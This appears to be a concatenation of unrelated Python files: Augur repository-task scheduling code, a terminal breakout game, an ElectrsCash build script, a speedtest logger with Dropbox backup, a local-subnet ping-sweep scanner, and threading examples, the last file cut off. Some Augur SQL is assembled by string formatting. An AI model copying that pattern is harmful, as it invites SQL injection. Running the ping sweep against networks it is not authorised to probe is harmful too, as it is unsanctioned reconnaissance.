"job_type": job['job_type'] if 'job_type' in job else 'MAINTAIN',
"models": [job['model']],
"display_name": "{} model for url: {}".format(job['model'], repo['repo_git']),
"given": {}
}
task['given'][given_key] = repo['repo_git']
if "focused_task" in repo:
task["focused_task"] = repo['focused_task']
try:
requests.post('http://{}:{}/api/unstable/task'.format(
broker_host,broker_port), json=task, timeout=10)
except Exception as e:
logger.error("Error encountered: {}".format(e))
logger.debug(task)
time.sleep(15)
elif job['given'][0] == 'repo_group':
task = {
"job_type": job['job_type'] if 'job_type' in job else 'MAINTAIN',
"models": [job['model']],
"display_name": "{} model for repo group id: {}".format(job['model'], repo_group_id),
"given": {
"repo_group": job['repos']
}
}
try:
requests.post('http://{}:{}/api/unstable/task'.format(
broker_host,broker_port), json=task, timeout=10)
except Exception as e:
logger.error("Error encountered: {}".format(e))
logger.info("Housekeeper finished sending {} tasks to the broker for it to distribute to your worker(s)".format(len(job['repos'])))
time.sleep(job['delay'])
except KeyboardInterrupt as e:
pass
def join_updates(self):
"""
Join to the update processes
"""
for process in self._processes:
logger.debug(f"Joining {process.name} update process")
process.join()
def shutdown_updates(self):
"""
Ends all running update processes
"""
for process in self._processes:
# logger.debug(f"Terminating {process.name} update process")
process.terminate()
def prep_jobs(self):
logger.info("Preparing housekeeper jobs")
for job in self.jobs:
if 'repo_group_id' in job or 'repo_ids' in job:
# If RG id is 0 then it just means to query all repos
where_and = 'AND' if job['model'] == 'issues' and 'repo_group_id' in job else 'WHERE'
where_condition = '{} repo_group_id = {}'.format(where_and, job['repo_group_id']
) if 'repo_group_id' in job and job['repo_group_id'] != 0 else '{} repo.repo_id IN ({})'.format(
where_and, ",".join(str(id) for id in job['repo_ids'])) if 'repo_ids' in job else ''
repo_url_sql = s.sql.text("""
SELECT repo.repo_id, repo.repo_git, pull_request_count, collected_pr_count,
(repo_info.pull_request_count - pr_count.collected_pr_count) AS pull_requests_missing
FROM augur_data.repo LEFT OUTER JOIN (
SELECT count(*) AS collected_pr_count, repo_id
FROM pull_requests GROUP BY repo_id ) pr_count
ON pr_count.repo_id = repo.repo_id LEFT OUTER JOIN (
SELECT repo_id, MAX ( data_collection_date ) AS last_collected
FROM augur_data.repo_info
GROUP BY repo_id) recent_info
ON recent_info.repo_id = pr_count.repo_id LEFT OUTER JOIN repo_info
ON recent_info.repo_id = repo_info.repo_id
AND repo_info.data_collection_date = recent_info.last_collected
{}
GROUP BY repo.repo_id, repo_info.pull_request_count, pr_count.collected_pr_count
ORDER BY pull_requests_missing DESC NULLS LAST
""".format(where_condition)) if job['model'] == 'pull_requests' else s.sql.text("""
SELECT
*
FROM
(
( SELECT repo_git, repo.repo_id, issues_enabled, COUNT ( * ) AS meta_count
FROM repo left outer join repo_info on repo.repo_id = repo_info.repo_id
--WHERE issues_enabled = 'true'
GROUP BY repo.repo_id, issues_enabled
ORDER BY repo.repo_id ) zz
LEFT OUTER JOIN (
SELECT repo.repo_id,
repo.repo_name,
b.issues_count,
d.repo_id AS issue_repo_id,
e.last_collected,
COUNT ( * ) AS issues_collected_count,
(
b.issues_count - COUNT ( * )) AS issues_missing,
ABS (
CAST (( COUNT ( * )) AS DOUBLE PRECISION ) / CAST ( b.issues_count + 1 AS DOUBLE PRECISION )) AS ratio_abs,
(
CAST (( COUNT ( * )) AS DOUBLE PRECISION ) / CAST ( b.issues_count + 1 AS DOUBLE PRECISION )) AS ratio_issues
FROM
augur_data.repo left outer join
augur_data.pull_requests d on d.repo_id = repo.repo_id left outer join
augur_data.repo_info b on d.repo_id = b.repo_id left outer join
( SELECT repo_id, MAX ( data_collection_date ) AS last_collected FROM augur_data.repo_info GROUP BY repo_id ORDER BY repo_id ) e
on e.repo_id = d.repo_id and b.data_collection_date = e.last_collected
WHERE d.pull_request_id IS NULL
{}
GROUP BY
repo.repo_id,
d.repo_id,
b.issues_count,
e.last_collected
ORDER BY ratio_abs
) yy ON zz.repo_id = yy.repo_id
) D
ORDER BY ratio_abs NULLS FIRST
""".format(where_condition)) if job['model'] == 'issues' and 'repo_group_id' in job else s.sql.text("""
SELECT repo_git, repo_id FROM repo {} ORDER BY repo_id ASC
""".format(where_condition)) if 'order' not in job else s.sql.text("""
SELECT repo_git, repo.repo_id, count(*) as commit_count
FROM augur_data.repo left outer join augur_data.commits
on repo.repo_id = commits.repo_id
{}
group by repo.repo_id ORDER BY commit_count {}
""".format(where_condition, job['order']))
reorganized_repos = pd.read_sql(repo_url_sql, self.db, params={})
if len(reorganized_repos) == 0:
logger.warning("Trying to send tasks for repo group, but the repo group does not contain any repos: {}".format(repo_url_sql))
job['repos'] = []
continue
if 'starting_repo_id' in job:
last_id = job['starting_repo_id']
else:
repoIdSQL = s.sql.text("""
SELECT since_id_str FROM worker_job
WHERE job_model = '{}'
""".format(job['model']))
job_df = pd.read_sql(repoIdSQL, self.helper_db, params={})
# If there is no job tuple found, insert one
if len(job_df) == 0:
job_tuple = {
'job_model': job['model'],
'oauth_id': 0
}
result = self.helper_db.execute(self.job_table.insert().values(job_tuple))
logger.debug("No job tuple for {} model was found, so one was inserted into the job table: {}".format(job['model'], job_tuple))
# If a last id is not recorded, start from beginning of repos
# (first id is not necessarily 0)
try:
last_id = int(job_df.iloc[0]['since_id_str'])
except:
last_id = 0
jobHistorySQL = s.sql.text("""
SELECT max(history_id) AS history_id, status FROM worker_history
GROUP BY status
LIMIT 1
""")
history_df = pd.read_sql(jobHistorySQL, self.helper_db, params={})
finishing_task = False
if len(history_df.index) != 0:
if history_df.iloc[0]['status'] == 'Stopped':
self.history_id = int(history_df.iloc[0]['history_id'])
finishing_task = True
# Rearrange repos so the one after the last one that
# was completed will be ran first (if prioritized ordering is not available/enabled)
if job['model'] not in ['issues', 'pull_requests']:
before_repos = reorganized_repos.loc[reorganized_repos['repo_id'].astype(int) < last_id]
after_repos = reorganized_repos.loc[reorganized_repos['repo_id'].astype(int) >= last_id]
reorganized_repos = after_repos.append(before_repos)
if 'all_focused' in job:
reorganized_repos['focused_task'] = job['all_focused']
reorganized_repos = reorganized_repos.to_dict('records')
if finishing_task:
reorganized_repos[0]['focused_task'] = 1
job['repos'] = reorganized_repos
elif 'repo_id' in job:
job['repo_group_id'] = None
repoUrlSQL = s.sql.text("""
SELECT repo_git, repo_id FROM repo WHERE repo_id = {}
""".format(job['repo_id']))
rs = pd.read_sql(repoUrlSQL, self.db, params={})
if 'all_focused' in job:
rs['focused_task'] = job['all_focused']
rs = rs.to_dict('records')
job['repos'] = rs
# time.sleep(120)
def update_url_redirects(self):
if 'switch' in self.update_redirects and self.update_redirects['switch'] == 1 and 'repo_group_id' in self.update_redirects:
repos_urls = self.get_repos_urls(self.update_redirects['repo_group_id'])
if self.update_redirects['repo_group_id'] == 0:
logger.info("Repo Group Set to Zero for URL Updates")
else:
logger.info("Repo Group ID Specified.")
for url in repos_urls:
url = self.trim_git_suffix(url)
if url:
r = requests.get(url)
check_for_update = url != r.url
if check_for_update:
self.update_repo_url(url, r.url, self.update_redirects['repo_group_id'])
def trim_git_suffix(self, url):
if url.endswith('.git'):
url = url.replace('.git', '')
elif url.endswith('.github.io'):
url = url.replace('.github.io', '')
elif url.endswith('/.github'):
url = ''
return url
def get_repos_urls(self, repo_group_id):
if self.update_redirects['repo_group_id'] == 0:
repos_sql = s.sql.text("""
SELECT repo_git FROM repo
""")
logger.info("repo_group_id is 0")
else:
repos_sql = s.sql.text("""
SELECT repo_git FROM repo
                WHERE repo_group_id = :repo_group_id
""")
repos = pd.read_sql(repos_sql, self.db, params={'repo_group_id': repo_group_id})
if len(repos) == 0:
logger.info("Did not find any repositories stored in augur_database for repo_group_id {}\n".format(repo_group_id))
return repos['repo_git']
def update_repo_url(self, old_url, new_url, repo_group_id):
trimmed_new_url = self.trim_git_suffix(new_url)
if not trimmed_new_url:
logger.info("New repo is named .github : {} ... skipping \n".format(new_url))
return
else:
new_url = trimmed_new_url
old_repo_path = Housekeeper.parseRepoName(old_url)
old_repo_group_name = old_repo_path[0]
new_repo_path = Housekeeper.parseRepoName(new_url)
new_repo_group_name = new_repo_path[0]
if old_repo_group_name != new_repo_group_name:
# verifying the old repo group name is available in the database
old_rg_name_sql = s.sql.text("""
SELECT rg_name FROM repo_groups
                WHERE repo_group_id = :repo_group_id
""")
old_rg_name_from_DB = pd.read_sql(old_rg_name_sql, self.db, params={'repo_group_id': repo_group_id})
if len(old_rg_name_from_DB['rg_name']) > 0 and old_repo_group_name != old_rg_name_from_DB['rg_name'][0]:
logger.info("Incoming old repo group name doesn't match the DB record for repo_group_id {} . Incoming name: {} DB record: {} \n".format(repo_group_id, old_repo_group_name, old_rg_name_from_DB['rg_name'][0]))
# checking if the new repo group name already exists and
# inserting it in repo_groups if it doesn't
rg_name_check_sql = s.sql.text("""
SELECT rg_name, repo_group_id FROM repo_groups
WHERE rg_name = :new_repo_group_name
""")
rg_name_check = pd.read_sql(rg_name_check_sql, self.db, params={'new_repo_group_name': new_repo_group_name})
new_rg_name_already_exists = len(rg_name_check['rg_name']) > 0
if new_rg_name_already_exists:
new_repo_group_id = rg_name_check['repo_group_id'][0]
else:
insert_sql = s.sql.text("""
INSERT INTO repo_groups("rg_name", "rg_description", "rg_website", "rg_recache", "rg_last_modified", "rg_type", "tool_source", "tool_version", "data_source", "data_collection_date")
VALUES (:new_repo_group_name, '', '', 0, CURRENT_TIMESTAMP, 'Unknown', 'Loaded by user', '1.0', 'Git', CURRENT_TIMESTAMP) RETURNING repo_group_id;
""")
new_repo_group_id = self.db.execute(insert_sql, new_repo_group_name=new_repo_group_name).fetchone()[0]
logger.info("Inserted repo group {} with id {}\n".format(new_repo_group_name, new_repo_group_id))
new_repo_group_id = '%s' % new_repo_group_id
update_sql = s.sql.text("""
UPDATE repo SET repo_git = :new_url, repo_path = NULL, repo_name = NULL, repo_status = 'New', repo_group_id = :new_repo_group_id
WHERE repo_git = :old_url
""")
self.db.execute(update_sql, new_url=new_url, new_repo_group_id=new_repo_group_id, old_url=old_url)
logger.info("Updated repo url from {} to {}\n".format(new_url, old_url))
else:
update_sql = s.sql.text("""
UPDATE repo SET repo_git = :new_url, repo_path = NULL, repo_name = NULL, repo_status = 'New'
WHERE repo_git = :old_url
""")
self.db.execute(update_sql, new_url=new_url, old_url=old_url)
logger.info("Updated repo url from {} to {}\n".format(new_url, old_url))
    @staticmethod
    def parseRepoName(repo_url):
path = urlparse(repo_url).path
parts = path.split('/')
return parts[1:]
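# --- Illustrative sketch (not part of Augur): the redirect check performed by
# update_url_redirects() in isolation. requests.get() follows redirects, so a
# final URL that differs from the requested one signals that the repo has moved.
def detect_redirect(url):
    """Return the redirected URL if `url` resolves somewhere else, otherwise None."""
    r = requests.get(url)
    return r.url if r.url != url else None
# Example of the owner/name split done by parseRepoName (not executed):
#   Housekeeper.parseRepoName("https://github.com/chaoss/augur") -> ['chaoss', 'augur']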
|
WindowManagement.py
|
import numpy as np
import colorama
from time import sleep
from .Components import EmptyPage
import signal
from ..utils.colors import color_map, color_map_vectorized, cursor_goto, clear_screen
from ..utils.genComponentID import calculate_least_value_nin_array
from ..utils.inputHandler import getchar
from time import time
from queue import Queue
from threading import Thread
from .Components import Border
from os import system, name
from .Ball import Ball
from .Paddle import Paddle
from .Powerup import Powerup, SplitPowerup
from .Numbers import Score
from random import choice
from ..utils.collision import collide_inner
from copy import deepcopy
from .Numbers import Lives
from .Level import Level
# An exception to raise whenever an alarm hits when taking inputs
class CustomAlarmException(Exception):
pass
class Window:
def __init__(self, config):
self.config = config
self.components = {
0: Border(config.WIDTH, config.HEIGHT, 8) if config.BORDER else EmptyPage(config.WIDTH, config.HEIGHT),
1: Score((4, 2), 4)
}
self.active_components = [0, 1]
self.input_components = []
self.ball_components = []
self.paddle_component = None
self.active_powerup = None
self.input_queue = Queue()
self.allowed_inputs = ["a", "d", " ", "r", "w", "s"]
colorama.init(autoreset=True)
self.exit = False
self.lives_manager = Lives(self.config.WIDTH, 2, 5)
self.add_component(self.lives_manager, True)
def activate_component(self, component_id):
if component_id not in self.active_components:
self.active_components.append(component_id)
def deactivate_component(self, component_id):
if component_id in self.active_components:
self.active_components = [el for el in self.active_components if el != component_id]
def add_component(self, component, make_active=False, takes_input=False):
component_id = calculate_least_value_nin_array(self.active_components)
self.components[component_id] = component
if make_active:
self.activate_component(component_id)
if takes_input:
self.input_components.append(component_id)
if isinstance(component, Ball):
self.ball_components.append(component_id)
elif isinstance(component, Paddle):
self.paddle_component = component
def remove_component(self, component_id):
if component_id in self.components:
del self.components[component_id]
if component_id in self.active_components:
self.active_components = [el for el in self.active_components if el != component_id]
if component_id in self.input_components:
self.input_components = [el for el in self.input_components if el != component_id]
if component_id in self.ball_components:
self.ball_components = [el for el in self.ball_components if el != component_id]
def render_components(self):
num_active = len(self.active_components)
frame_buffer = np.zeros((self.config.WIDTH, self.config.HEIGHT))
for component_id in self.active_components:
if not self.config.BORDER and num_active > 1 and component_id == 0:
continue
component = self.components[component_id]
bbox = [*component.start, component.width + component.start[0], component.height + component.start[1]]
frame_buffer[bbox[0]:bbox[2], bbox[1]:bbox[3]] = component.render()
Window.blit(frame_buffer.T)
def game_loop(self):
renderer = Thread(target=self.render_thread)
renderer.start()
self.input_thread()
renderer.join()
# Do all cleanup here
if name == 'posix':
_ = system('tput cnorm; clear')
else:
_ = system('cls')
exit()
def render_thread(self):
sub_frame_number = 0
graphics_update = int(self.config.FRAME_DURATION / self.config.COUNT_GRAPHICS_UPDATES)
physics_update = int(self.config.FRAME_DURATION / self.config.COUNT_PHYSICS_UPDATES)
start_time = time()
# clear_screen()
while not self.exit:
if self.config.ONE_FRAME_ONLY and sub_frame_number == self.config.FRAME_DURATION - 1:
break
# Perform physics updates and other event updates here - more than once per frame
if sub_frame_number % physics_update == 0:
# Check if there are no balls left, if so reduce the lives and add a new ball
if len(self.ball_components) == 0:
gameover = self.lives_manager.decrease_life()
# Check if game is over or not, if over exit
if gameover:
self.exit = True
else:
ball = Ball(-18, self.paddle_component)
self.add_component(ball, True, True)
# Cleanup all dead powerup components as well as catch the completion of a level
tobe_removed = []
for (component_id, component) in self.components.items():
if isinstance(component, Level) and component.is_complete:
self.exit = True
                    # If a powerup component has already started but is no longer active,
                    # the only state it can be in is dead
                    if issubclass(type(component), Powerup) and component.start_time != -1 and not component.is_active:
# Check if the powerup component is a ball split to revert it
if isinstance(component, SplitPowerup):
for ball_id in self.ball_components[len(self.ball_components)//2:]:
tobe_removed.append(ball_id)
tobe_removed.append(component_id)
for component_id in tobe_removed:
self.remove_component(component_id)
update_time = time() - start_time
# Send all the inputs over to the components that require them
while not self.input_queue.empty():
event = self.input_queue.get(block=False)
for to_dispatch in self.input_components:
self.components[to_dispatch].handle_event(event, (2, 2, self.config.WIDTH - 2, self.config.HEIGHT - 1))
# Perform time updates
for to_dispatch in self.input_components:
self.components[to_dispatch].handle_event("t", update_time)
# Perform the ball's collision updates
powerup_to_be_added = None
for component_id in self.active_components:
for ball_id in self.ball_components:
component = self.components[component_id]
if component.is_collideable:
powerup, score = self.components[ball_id].collide_with(component)
if powerup is not None and powerup_to_be_added is None:
powerup_to_be_added = powerup
if score != 0:
self.components[1].update_score(score)
# Add the powerup component to be rendered
if powerup_to_be_added is not None:
self.add_component(powerup_to_be_added, True, True)
# Perform the paddle's collision updates
changed_id = -1
to_add_balls = []
for component_id in self.active_components:
component = self.components[component_id]
if issubclass(type(component), Powerup) and self.paddle_component.start[0] <= component.start[0] <= self.paddle_component.start[0] + self.paddle_component.width and component.start[1] == self.paddle_component.start[1] - 1:
changed_id = component_id
self.components[changed_id].paddle = self.paddle_component
self.components[changed_id].balls = [self.components[ball_id] for ball_id in self.ball_components]
self.components[changed_id].speed = 0
self.components[changed_id].start = (60, 4) + np.random.randint(-3, 3, 2)
self.components[changed_id].execute_powerup(update_time)
# Check if the captured powerup is a multiplier - if it is then multiply the balls
if isinstance(component, SplitPowerup):
for ball_id in self.ball_components:
ball = self.components[ball_id]
to_add_balls.append(Ball(
ball.color,
ball.paddle,
ball_pos=ball.pos + choice([-1, 1]) * np.random.randint(1, 3, 2),
stuck_pos=ball.stuck_to_paddle,
vel_dir=(ball.vel_dir * np.array([-1, 1])),
))
for ball in to_add_balls:
self.add_component(ball, True, True)
# Remove the caught powerup from getting rendered
if changed_id > 0:
self.deactivate_component(changed_id)
# Perform all the collision of powerups with the walls and kill it accordingly
tobe_removed = []
for (component_id, component) in self.components.items():
if (issubclass(type(component), Powerup) or isinstance(component, Ball)) and component.start[1] >= self.config.HEIGHT - 2:
tobe_removed.append(component_id)
for comp_id in tobe_removed:
self.remove_component(comp_id)
# Update the graphics once per frame
if sub_frame_number % graphics_update == 0:
self.render_components()
sub_frame_number += 1
def input_thread(self):
# Set Alarm Signal handlers to catch and raise an exception
def alarmSignalHandler(signalNum, frame):
raise CustomAlarmException
signal.signal(signal.SIGALRM, alarmSignalHandler)
while not self.exit:
signal.setitimer(signal.ITIMER_REAL, 0.1) # Set a timer with 0.1 seconds interval
input_char = ''
try:
input_char = getchar()
signal.alarm(0) # Cancelled the alarm signal if we get a character
except CustomAlarmException:
# The raised exception stops from taking the input
pass
# Check for quit character and return
if input_char == 'q':
self.exit = True
            # Push the input to the input queue after checking if it is valid
if input_char in self.allowed_inputs:
self.input_queue.put(input_char)
@staticmethod
def blit(buffer):
buffer = color_map_vectorized(buffer)
for row in range(buffer.shape[0]):
cursor_goto(row + 1, 0)
print("".join(buffer[row]))
|
build_electrs.py
|
#!/usr/bin/env python3
import argparse
import logging
import os
import sys
import shutil
PROJECT_NAME = "ElectrsCash"
GIT_REPO = "https://github.com/BitcoinUnlimited/{}.git".format(PROJECT_NAME)
# When released put a tag here 'v2.0.0'
# When in development, put 'master' here.
GIT_BRANCH = "v3.0.0"
# When released put a hash here: "aa95d64d050c286356dadb78d19c2e687dec85cf"
# When in development, put 'None' here
EXPECT_HEAD = "9288d9f1bc828e06dca3b8783567c7557530740b"
ROOT_DIR = os.path.realpath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
ELECTRS_DIR = os.path.join(ROOT_DIR, PROJECT_NAME)
ELECTRS_BIN = "electrscash"
parser = argparse.ArgumentParser()
parser.add_argument('--allow-modified', help='Allow building modified/dirty repo',
action = "store_true")
parser.add_argument('--verbose', help='Sets log level to DEBUG',
action = "store_true")
parser.add_argument('--dst', help='Where to copy produced binary',
default=os.path.join(ROOT_DIR, "src"))
parser.add_argument('--target', help='Target platform (e.g. x86_64-pc-linux-gnu)',
default="x86_64-unknown-linux-gnu")
parser.add_argument('--debug', help="Do a debug build", action = "store_true")
parser.add_argument('--builddir', help="Out of source build directory", default=None)
args = parser.parse_args()
level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(format = '%(asctime)s.%(levelname)s: %(message)s',
level=level,
stream=sys.stdout)
def bail(*args):
logging.error(*args)
sys.exit(1)
def check_dependencies():
v = sys.version_info
if v[0] < 3 or (v[0] == 3 and v[1] < 3):
bail("python >= 3.3 required");
try:
import git
except Exception as e:
logging.error("Failed to 'import git'")
logging.error("Tip: Install with: python3 -m pip install gitpython")
logging.error("Tip: On Debian/Ubuntu you can install python3-git")
bail(str(e))
import shutil
if shutil.which("cargo") is None:
logging.error("Cannot find 'cargo', will not be able to build {}".format(PROJECT_NAME))
logging.error("You need to install rust (1.38+) https://rustup.rs/")
logging.error("Tip: On Debian/Ubuntu you need to install cargo")
bail("rust not found")
if shutil.which("clang") is None:
logging.error("Cannot find 'clang', will not be able to build {}".format(PROJECT_NAME))
logging.error("Tip: On Debian/Ubuntu you need to install clang")
bail("clang not found")
if not os.path.isdir(args.dst):
bail("--dst provided '%s' is not a directory", args.dst)
def clone_repo():
import git
logging.info("Cloning %s to %s", GIT_REPO, ELECTRS_DIR)
repo = git.Repo.clone_from(GIT_REPO, ELECTRS_DIR, branch=GIT_BRANCH)
def verify_repo(allow_modified):
import git
repo = git.Repo(ELECTRS_DIR)
if repo.is_dirty():
logging.error("Validation failed - %s has local modifications. Use `--allow-modified` if you wanted to build from a dirty repository", ELECTRS_DIR)
allow_modified or bail("Bailing")
    if EXPECT_HEAD is None:
logging.warning("ElectrsCash is not fixed to a specific revision. Please assign the EXPECT_HEAD variable in build_electrs.py before releasing.")
if EXPECT_HEAD is not None and repo.head.object.hexsha != EXPECT_HEAD:
# TODO: Add command line option to reset HEAD to GIT_BRANCH at EXPECT_HEAD
logging.error("Validation failed - %s HEAD differs from expected (%s vs %s)",
PROJECT_NAME, repo.head.object.hexsha, EXPECT_HEAD)
allow_modified or bail("Bailing")
def output_reader(pipe, queue):
try:
with pipe:
for l in iter(pipe.readline, b''):
queue.put(l)
finally:
queue.put(None)
def cargo_run(args):
import subprocess
from threading import Thread
from queue import Queue
cargo = shutil.which("cargo")
args = [cargo] + args
logging.info("Running %s", args)
assert cargo is not None
p = subprocess.Popen(args, cwd = ELECTRS_DIR,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
q = Queue()
Thread(target = output_reader, args = [p.stdout, q]).start()
Thread(target = output_reader, args = [p.stderr, q]).start()
for line in iter(q.get, None):
logging.info(line.decode('utf-8').rstrip())
p.wait()
rc = p.returncode
assert rc is not None
if rc != 0:
bail("cargo failed with return code %s", rc)
def get_target(makefile_target):
# Try to map the target passed from the makefile to the equivalent in rust
# To see supported targets, run: rustc --print target-list
# Trim away darwin version number
if makefile_target.startswith('x86_64-apple-darwin'):
makefile_target = 'x86_64-apple-darwin'
target_map = {
'x86_64-pc-linux-gnu' : 'x86_64-unknown-linux-gnu',
'i686-pc-linux-gnu' : 'i686-unknown-linux-gnu',
'x86_64-apple-darwin': 'x86_64-apple-darwin'
}
if makefile_target in target_map:
return target_map[makefile_target]
if makefile_target in target_map.values():
return makefile_target
logging.warning("Target %s is not mapped, passing it to rust and hoping it works"
% makefile_target)
return makefile_target
check_dependencies()
if not os.path.exists(ELECTRS_DIR):
clone_repo()
verify_repo(args.allow_modified)
def build_flags(debug, target, builddir):
flags = ["--target={}".format(get_target(target))]
if builddir is not None:
flags.append("--target-dir={}".format(os.path.abspath(builddir)))
if debug:
return flags
return flags + ["--release"]
cargo_run(["build", "--verbose", "--locked"] + build_flags(args.debug, args.target, args.builddir))
cargo_run(["test", "--verbose", "--locked"] + build_flags(args.debug, args.target, args.builddir))
def build_type_dir(debug):
if debug:
return "debug"
return "release"
def binary_dir(target, debug, builddir):
"""
The directory where the electrscash binaries are built.
"""
root = builddir if builddir is not None else os.path.join(ELECTRS_DIR, "target")
return os.path.join(root, get_target(target), build_type_dir(debug))
src = os.path.join(binary_dir(args.target, args.debug, args.builddir), ELECTRS_BIN)
logging.info("Copying %s to %s", src, args.dst)
shutil.copy(src, args.dst)
logging.info("Done")
|
main.py
|
from threading import Thread
import datetime
import speedtest
import urllib.request
import time
import sqlite3
import re
import dropbox
from dropbox.files import WriteMode
from dropbox.exceptions import ApiError
# backing up the database to dropbox
def backup():
localfile = './speedloggerdb.db'
destination = '/speedloggerdb.db'
token = 'YOUR TOKEN' # Add your personal Dropbox Access Token as String
dbx = dropbox.Dropbox(token) # Connecting to dropbox folder
with open('./speedloggerdb.db', 'rb') as f:
# We use WriteMode=overwrite to make sure that the settings in the file
# are changed on upload
print("Uploading " + localfile + " to Dropbox")
try:
dbx.files_upload(f.read(), destination, mode=WriteMode('overwrite'))
except ApiError as err:
pass
# fetches the result number of the last entry and adds 1
def getnewrnr(cursor):
cursor.execute("SELECT rnr FROM results ORDER BY rnr DESC LIMIT 1")
return cursor.fetchone()[0] + 1
# corrects the time format returned from datetime for regex
def correctdate(hours, minutes):
if minutes <= 9:
return str(hours) + ":0" + str(minutes)
else:
return str(hours) + ":" + str(minutes)
# fixes the datetime format to a readable format
def get_date(date):
return datetime.datetime.strptime(date, '%Y-%m-%d').strftime('%d.%m.%y')
def speedlogger():
print("started speedlogger")
conn = sqlite3.connect("speedloggerdb.db") # establishing database connection
c = conn.cursor()
currenttime = correctdate(datetime.datetime.now().hour, datetime.datetime.now().minute) # Format 00:00
currentday = get_date(str(datetime.datetime.now().date()))
try:
print("running speedtest")
servers = []
speedlog = speedtest.Speedtest()
speedlog.get_servers(servers)
speedlog.get_best_server()
speedlog.download()
speedlog.upload(pre_allocate=False)
print("Current Date: %s %s", str(currentday), str(currenttime))
print("Download: " + str(round(speedlog.results.download / (1000*1000), 2)) + " Mbit/s") # fixed byte to megabit output
print("Upload: " + str(round(speedlog.results.upload / (1000*1000), 2)) + " Mbit/s") # fixed byte to megabit output
print("Ping: " + str(speedlog.results.ping))
print("Timestamp: " + str(speedlog.results.timestamp))
print("Bytes received: " + str(speedlog.results.bytes_received))
print("Bytes sent: " + str(speedlog.results.bytes_sent))
print("Link: " + str(speedlog.results.share()))
download = float(round(speedlog.results.download / (1000*1000), 2)) # fixed byte to megabit output
upload = float(round(speedlog.results.upload / (1000*1000), 2)) # fixed byte to megabit output
ping = float(round(speedlog.results.ping))
bytes_received = float(speedlog.results.bytes_received)
bytes_sent = float(speedlog.results.bytes_sent)
result_pic = str(speedlog.results.share())
params = (getnewrnr(c), currentday, currenttime, download, upload, ping, bytes_received, bytes_sent, result_pic)
c.execute("INSERT INTO results VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)", params)
print("finished speedtest")
# saving the changes
conn.commit()
# downloading the speedtest result as .png to display it in ui later on
# urllib.request.urlretrieve(speedlog.results.share(), str("speedtestresult.png"))
# backup of the database
backup()
except speedtest.SpeedtestException:
print("speedtest failed")
# adding empty entries due to failure
params = (getnewrnr(c), currentday, currenttime, 0, 0, 0, 0, 0, "")
c.execute("INSERT INTO results VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)", params)
# saving the changes
conn.commit()
if __name__ == '__main__':
speedThread = Thread(target=speedlogger, args=())  # speedtest thread
speedThread.start()
|
network_scan.py
|
#!/usr/bin/env python
##############################################Network Scanner############################################
##############################################Author- Jagmohan Singh(B11062)############################################
####################################################- Rishabh Sahu(B11025)#####################################
###############################################Date-19 November 2014 ###########################################
from threading import Thread
import subprocess
from Queue import Queue
import socket, struct, fcntl
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
def get_ip(iface = 'wlan0'):####################function to get the local ip for wireless
ifreq = struct.pack('16sH14s', iface, socket.AF_INET, '\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
ip=get_ip('wlan0')####getting the ip
ip=ip.split('.')
ip=ip[0]+'.'+ip[1]+'.'+ip[2]+'.'####splitting the ip
num_threads = 20
queue = Queue()
#wraps system ping command
##function to check the status of node
def pinger(i, q):
"""Pings subnet"""
while True:
fp=open("result.dat",'a')
ip = q.get()
print "Thread %s: Pinging %s" % (i, ip)
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
fp.write(ip+"\n")
else:
print "%s: did not respond" % ip
q.task_done()
#Spawn thread pool
###thread pools
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
#Place work in queue
for i in range(0,256):
ip1=ip+str(i)
queue.put(ip1)
#Wait until worker threads are done to exit
queue.join()
|
alternative.py
|
import threading as th
th_even = th.Event()
th_odd = th.Event()
def even_foo():
global num
global limit
while num <= limit:
th_even.wait() # true
print('even: ' + str(num))
num += 1
th_odd.set() # true
th_even.clear() # false
def odd_foo():
global num
global limit
while num <= limit:
th_odd.wait()
print('odd: ' + str(num))
num += 1
th_even.set()
th_odd.clear()
if __name__ == '__main__':
num = 0
limit = 23
t1 = th.Thread(target=even_foo)
t2 = th.Thread(target=odd_foo)
th_even.set()
t1.start()
t2.start()
t1.join()
t2.join()
|
queuetest-gui-class.py
|
"Recoding with classes and bound methods"
# GUI that displays data produced and queued by worker threads (class-based)
import threading, queue, time
from tkinter.scrolledtext import ScrolledText
class ThreadGui(ScrolledText):
threadsPerClick = 4
def __init__(self, parent=None):
ScrolledText.__init__(self, parent)
self.pack()
self.dataQueue = queue.Queue() # infinite size
self.bind('<Button-1>', self.makethreads) # on left mouse click
self.consumer() # queue loop in main thread
def producer(self, id):
for i in range(5):
time.sleep(0.1)
self.dataQueue.put('[producer id=%d, count=%d]' % (id, i))
def consumer(self):
try:
data = self.dataQueue.get(block=False)
except queue.Empty:
pass
else:
self.insert('end', 'consumer got => %s\n' % str(data))
self.see('end')
self.after(100, self.consumer) # 4 times per sec
def makethreads(self, event):
for i in range(self.threadsPerClick):
threading.Thread(target=self.producer, args=(i,)).start()
if __name__ == '__main__':
root = ThreadGui() # in main thread: make GUI, run timer loop
root.mainloop() # pop-up window, enter tk event loop
'''
This version uses Python’s threading module instead of _thread. This would
normally mean that, unlike the prior version, the program would not exit if any producer
threads are still running, unless they are made daemons manually by setting their
daemon flag to True. Remember that under threading, programs exit when only daemonic
threads remain; the producer threads here inherit a False daemon value from
the thread that creates them, which prevents program exit while they run.
'''
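# A minimal illustration (not part of the GUI program above) of the rule the note
# describes: under the threading module the interpreter exits only when no
# non-daemonic threads remain, so the daemon flag decides whether a worker can be
# abandoned at exit. The helper below is a sketch and is never called here.
def _daemon_flag_demo(daemonic=False):
    import threading, time

    def work():
        time.sleep(0.5)
        print('worker finished')

    t = threading.Thread(target=work)
    t.daemon = daemonic  # False (the inherited default) keeps the program alive until work() returns
    t.start()
    # With daemonic=True the program may exit before 'worker finished' is printed.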
|
pexpect.py
|
import os
import subprocess
import select
import time
import threading
import Queue
def enqueue_output(out, queue):
c = out.read(1)
while 0 < len(c):
queue.put(c)
c = out.read(1)
class pexpect:
